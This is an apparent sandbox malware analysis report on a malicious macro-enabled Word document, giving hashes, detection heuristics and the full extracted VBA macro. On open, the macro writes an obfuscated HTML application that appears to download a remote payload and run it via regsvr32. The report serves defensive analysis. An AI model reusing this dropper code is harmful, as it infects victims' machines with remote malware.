Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ffd1a0f7b732ef84…

MALICIOUS

Office (OOXML)

80.4 KB Created: 2021-04-01 07:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10
MD5: 5aeb42ac1a676fe8e4f1a62fb003b4a4 SHA-1: 18b4481dc3c3eb87f4dac76636a4e04b5db90e3f SHA-256: ffd1a0f7b732ef847a6d984d2a682933ca4be8e312fef4746f8154d3f3bfc40c
170 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set libData = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set libData = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9740 bytes
SHA-256: 040f3b7558f081ac943cce093fef28d07aa607fafb15827e3e3f1d74596e5029
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{B1D5C739-5049-44DB-9D74-AEF5833BC4B8}{CC4E20D5-F293-4AF4-8EDA-DA897C2FFA96}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function WStorage()
With frm.button1
WStorage = .Tag
End With
End Function
Function requestQueryList()
With frm.button1
requestQueryList = .Caption
End With
End Function
Public Sub button1_Click()
Set libData = CreateObject("wscript.shell")
libData.exec p(WStorage) & " " & p(requestQueryList)
End Sub


Attribute VB_Name = "libFuncCollection"
Sub autoopen()
localProcedureIterator
End Sub
Function intel(databaseValueMem)
intel = "" & databaseValueMem & ""
End Function
Sub localProcedureIterator()
Dim exceptionQuery As String
exceptionQuery = p(frm.button1.Caption)
Set repoBufBuffer = New memView
repoBufBuffer.titleCaptionLoad exceptionQuery, swapPaste
frm.button1_Click
End Sub
Function referenceDeleteException(vbText, countLen, globalArrayEx)
referenceDeleteException = Replace(vbText, countLen, globalArrayEx)
End Function

Attribute VB_Name = "classStorage"
Function ptrSelectRemove()
ptrSelectRemove = intel("<html><body><div id='content'>fTtlc29sYy5ldm9tZVJiaUxub2l0cGVjeG")
End Function
Function countRepo()
countRepo = intel("U7KTIgLCJncGouZWNuZXJlZmVSZXVsYXZcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbG")
End Function
Function listText()
listText = intel("lmb3RldmFzLmV2b21lUmJpTG5vaXRwZWN4ZTspeWRvYmVzbm9wc2VyLnlyZXVRb3")
End Function
Function sizeMemoryCopy()
sizeMemoryCopy = intel("BlUm5vaXRjZWxsb2MoZXRpcncuZXZvbWVSYmlMbm9pdHBlY3hlOzEgPSBlcHl0Lm")
End Function
Function WLoadRef()
WLoadRef = intel("V2b21lUmJpTG5vaXRwZWN4ZTtuZXBvLmV2b21lUmJpTG5vaXRwZWN4ZTspIm1hZX")
End Function
Function pointerRepo()
pointerRepo = intel("J0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSBldm9tZVJiaUxub2l0cGVjeG")
End Function
Function queryPointer()
queryPointer = intel("UgcmF2eykwMDIgPT0gc3V0YXRzLnlyZXVRb3BlUm5vaXRjZWxsb2MoZmk7KShkbm")
End Function
Function textText()
textText = intel("VzLnlyZXVRb3BlUm5vaXRjZWxsb2M7KWVzbGFmICwiNGVDbVZnN1BvbWZWUXg5PW")
End Function
Function WRepo()
WRepo = intel("RpcyZ0RlZPb25Qc3hRbj1kaSZ0V0dIdmt2OW4xYT12NFJ2T1pmcyZzOT1kaSZRZU")
End Function
Function databaseGenericTemp()
databaseGenericTemp = intel("11bGZ2OFZyZ2ZtS3o9PzExbmF4L1hxTHVuN05GU056eDhKczdnSW9YWDFMM21ydF")
End Function
Function convertTextboxData()
convertTextboxData = intel("o4ZlhLcWQ2U1RFanFIanUvdDNrcVdVaGFac0tSb0IvcUtUZ1RPOE0zYjJTSE43ZD")
End Function
Function classFunc()
classFunc = intel("YxcVgzTnRKUC9KZDVyQnVVVnRyVGcya3J3clh0ZGtCbm5SMjQveVhKWlZXdG9yck")
End Function
Function linkMainCount()
linkMainCount = intel("80UmwvMTI1OTQvMzM5OTgvNndjT1k2ZC9zeXVvZy9tb2MuMDIwMnNzaWV3LW5ldH")
End Function
Function repoRemove()
repoRemove = intel("Rpay8vOnB0dGgiICwiVEVHIihuZXBvLnlyZXVRb3BlUm5vaXRjZWxsb2M7KSJwdH")
End Function
Function bufferMemoryClass()
bufferMemoryClass = intel("RobG14LjJsbXhzbSIodGNlamJPWGV2aXRjQSB3ZW4gPSB5cmV1UW9wZVJub2l0Y2")
End Function
Function WRefTrust()
WRefTrust = intel("VsbG9jIHJhdg==|fXspcm90YXJldEllZ2Fyb3RzKGhjdGFjfTspImF0aC5lY25lc")
End Function
Function nextEx()
nextEx = intel("mVmZVJldWxhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZldGVsZWQuZXNub3BzZ")
End Function
Function bufMemory()
bufMemory = intel("VJlc2FiYXRhZHt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwaXJjcyIodGNla")
End Function
Function structDocumentSize()
structDocumentSize = intel("mJPWGV2aXRjQSB3ZW4gPSBlc25vcHNlUmVzYWJhdGFkIHJhdjspImdwai5lY25lc")
End Function
Function countCollectionTrust()
countCollectionTrust = intel("mVmZVJldWxhdlxcY2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci4pImxsZ")
End Function
Function screenQueryText()
screenQueryText = intel("WhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2Vu</div><div id='table1'>AB")
End Function
Function sizeBorderMain()
sizeBorderMain = intel("CDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div")
End Function
Function listboxGenericMem()
listboxGenericMem = intel("><div id='table3'></div><script language='javascript'>function m")
End Function
Function funcRef()
funcRef = intel("ainBuf(ptrExceptionView){return(new ActiveXObject(ptrExceptionVi")
End Function
Function trustConstIterator()
trustConstIterator = intel("ew));}function APointerProcedure(dataPointerGeneric){return(iter")
End Function
Function buttonRemove()
buttonRemove = intel("atorResponseNamespace.getElementById(dataPointerGeneric).innerHT")
End Function
Function loadPtrArgument()
loadPtrArgument = intel("ML);}function trustLenBuffer(){var tableBuffer = APointerProcedu")
End Function
Function constMemory()
constMemory = intel("re('table1');var swapRefNamespace = tableBuffer.toLowerCase();va")
End Function
Function referenceResponse()
referenceResponse = intel("r dataIteratorMemory = APointerProcedure('table2');return(tableB")
End Function
Function copyValue()
copyValue = intel("uffer + swapRefNamespace + dataIteratorMemory);}function countMe")
End Function
Function varStorageSelect()
varStorageSelect = intel("m(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var")
End Function
Function pasteMemConvert()
pasteMemConvert = intel(" swapSwap=''; var w=String.fromCharCode; var L=s.length;var refe")
End Function
Function constPtrPointer()
constPtrPointer = intel("renceText = 'charAt';for(i=0;i<64;i++){e[trustLenBuffer()[refere")
End Function
Function constViewRef()
constViewRef = intel("nceText](i)]=i;}for(x=0;x<L;x++){c=e[s[referenceText](x)];b=(b<<")
End Function
Function dataRepo()
dataRepo = intel("6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(swapS")
End Function
Function ACollectionStorage()
ACollectionStorage = intel("wap+=w(a));}}return(swapSwap);};function tableClear(bufClass){re")
End Function
Function namespaceScreen()
namespaceScreen = intel("turn bufClass.split('').reverse().join('');}collectionRef = wind")
End Function
Function argumentGlobalGlobal()
argumentGlobalGlobal = intel("ow;iteratorResponseNamespace = document;collectionRef.resizeTo(1")
End Function
Function requestException()
requestException = intel(", 1);collectionRef.moveTo(-100, -100);var titleMemWindow = itera")
End Function
Function nextPointerView()
nextPointerView = intel("torResponseNamespace.getElementById('content').innerHTML;var tit")
End Function
Function exceptionOptionDatabase()
exceptionOptionDatabase = intel("leMemWindow = titleMemWindow.split('|');var dataResponseWindow =")
End Function
Function bufCaption()
bufCaption = intel(" tableClear(countMem(titleMemWindow[0]));var variableClearDelete")
End Function
Function rightMemoryRight()
rightMemoryRight = intel(" = tableClear(countMem(titleMemWindow[1]));</script><script lang")
End Function
Function listboxNamespaceConvert()
listboxNamespaceConvert = intel("uage='javascript'>function rightGlobal(queryGlobalValue){var tem")
End Function
Function responseBorderW()
responseBorderW = intel("pQueryVar = mainBuf('msscriptcontrol.scriptcontrol');tempQueryVa")
End Function
Function argumentProcTextbox()
argumentProcTextbox = intel("r.Language = 'jscript';tempQueryVar.Timeout = 60000;tempQueryVar")
End Function
Function leftCaption()
leftCaption = intel(".AddCode(queryGlobalValue);return(null);}</script><script langua")
End Function
Function loadResponse()
loadResponse = intel("ge='vbscript'>rightGlobal dataResponseWindow : rightGlobal varia")
End Function
Function argumentNamespace()
argumentNamespace = intel("bleClearDelete : collectionRef.close</script></body></html>")
End Function
Function swapPaste()
swapPaste = ptrSelectRemove + countRepo + listText + sizeMemoryCopy + WLoadRef + pointerRepo + queryPointer + textText + WRepo + databaseGenericTemp + convertTextboxData + classFunc + linkMainCount + repoRemove + bufferMemoryClass + WRefTrust + nextEx + bufMemory + structDocumentSize + countCollectionTrust + screenQueryText + sizeBorderMain + listboxGenericMem + funcRef + trustConstIterator + buttonRemove + loadPtrArgument + constMemory + referenceResponse + copyValue + varStorageSelect + pasteMemConvert + constPtrPointer + constViewRef + dataRepo + ACollectionStorage + namespaceScreen + argumentGlobalGlobal + requestException + nextPointerView + exceptionOptionDatabase + bufCaption + rightMemoryRight + listboxNamespaceConvert + responseBorderW + argumentProcTextbox + leftCaption + loadResponse + argumentNamespace
End Function

Attribute VB_Name = "memView"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub titleCaptionLoad(iteratorTablePointer As String, textboxCollection As String)
Dim databaseCollectionSelect As FileSystemObject
Set databaseCollectionSelect = New FileSystemObject
Dim rightWW As TextStream
Set rightWW = databaseCollectionSelect.CreateTextFile(iteratorTablePointer)
rightWW.WriteLine textboxCollection
rightWW.Close
Set rightWW = Nothing
Set databaseCollectionSelect = Nothing
End Sub

Attribute VB_Name = "funcVarArray"
Function p(clearTempCopy)
p = referenceDeleteException(clearTempCopy, "@", "")
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 40960 bytes
SHA-256: 86bd81fbd1dd1222ff5cb0a616b8025a3b0ec4c8a0c48b9c54f2e8d956f5afc8

Open this report in the interactive analyzer, or submit your own file for analysis.